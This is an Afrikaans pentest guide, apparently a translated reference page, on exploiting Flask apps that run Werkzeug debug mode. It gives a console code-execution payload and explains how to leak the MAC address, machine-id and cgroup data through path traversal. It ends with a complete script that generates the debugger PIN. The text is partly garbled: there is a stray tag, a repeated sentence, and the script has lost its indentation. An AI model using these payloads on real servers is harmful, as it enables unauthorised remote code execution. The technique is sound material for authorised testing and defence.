Werkzeug / Flask Debug

Kry 'n hacker se perspektief op jou webtoepassings, netwerk, en wolk

Vind en rapporteer kritieke, exploiteerbare kwesbaarhede met werklike besigheidsimpak. Gebruik ons 20+ pasgemaakte gereedskap om die aanvaloppervlak te karteer, vind sekuriteitskwessies wat jou toelaat om voorregte te verhoog, en gebruik geoutomatiseerde eksploit om noodsaaklike bewyse te versamel, wat jou harde werk in oortuigende verslae omskep.

Penetration testing toolkit, ready to usePentest-Tools.com

Console RCE

As debug aktief is, kan jy probeer om toegang te verkry tot /console en RCE te verkry.

__import__('os').popen('whoami').read();

Daar is ook verskeie exploits op die internet soos hierdie of een in metasploit.

Pin Beskerm - Pad Traversal

In sommige gevalle gaan die /console eindpunt beskerm word deur 'n pin. As jy 'n file traversal vulnerability het, kan jy al die nodige inligting lek om daardie pin te genereer.

Werkzeug Console PIN Exploit

Forceer 'n debug foutbladsy in die app om dit te sien:

The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server

'n Boodskap rakende die "konsole vergrendel" scenario word teëgekom wanneer daar probeer word om toegang te verkry tot Werkzeug se foutopsporing koppelvlak, wat 'n vereiste vir 'n PIN aandui om die konsole te ontgrendel. Die voorstel word gemaak om die konsole PIN te benut deur die PIN generasie-algoritme in Werkzeug se foutopsporing inisialisasielêer (__init__.py) te analiseer. Die PIN generasie-meganisme kan bestudeer word vanaf die Werkzeug bronkode-bewaarplek, alhoewel dit aanbeveel word om die werklike bediener kode te verkry via 'n lêer traversering kwesbaarheid weens moontlike weergawe verskille.

Om die konsole PIN te benut, is twee stelle van veranderlikes, probably_public_bits en private_bits, nodig:

probably_public_bits

• username: Verwys na die gebruiker wat die Flask-sessie begin het.

• modname: Gewoonlik aangewys as flask.app.

• getattr(app, '__name__', getattr(app.__class__, '__name__')): Oor die algemeen los dit op na Flask.

• getattr(mod, '__file__', None): Verteenwoordig die volle pad na app.py binne die Flask-gids (bv. /usr/local/lib/python3.5/dist-packages/flask/app.py). As app.py nie van toepassing is nie, probeer app.pyc.

private_bits

• uuid.getnode(): Verkry die MAC-adres van die huidige masjien, met str(uuid.getnode()) wat dit in 'n desimale formaat vertaal.

• Om die bediener se MAC-adres te bepaal, moet 'n mens die aktiewe netwerkinterfaan identifiseer wat deur die app gebruik word (bv. ens3). In gevalle van onsekerheid, lek /proc/net/arp om die toestel-ID te vind, dan onttrek die MAC-adres van /sys/class/net/<device id>/address.

• Om 'n heksadesimale MAC-adres na desimaal om te skakel kan soos hieronder gedoen word:

# Voorbeeld MAC-adres: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

• get_machine_id(): Voeg data van /etc/machine-id of /proc/sys/kernel/random/boot_id saam met die eerste lyn van /proc/self/cgroup na die laaste skuinsstreep (/).

</details>

Na die versameling van alle nodige data, kan die exploit-skrip uitgevoer word om die Werkzeug-konsol PIN te genereer:

Na die versameling van alle nodige data, kan die exploit-skrip uitgevoer word om die Werkzeug-konsol PIN te genereer. Die skrip gebruik die saamgestelde `probably_public_bits` en `private_bits` om 'n hash te skep, wat dan verdere verwerking ondergaan om die finale PIN te produseer. Hieronder is die Python-kode om hierdie proses uit te voer:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',  # username
'flask.app',  # modname
'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)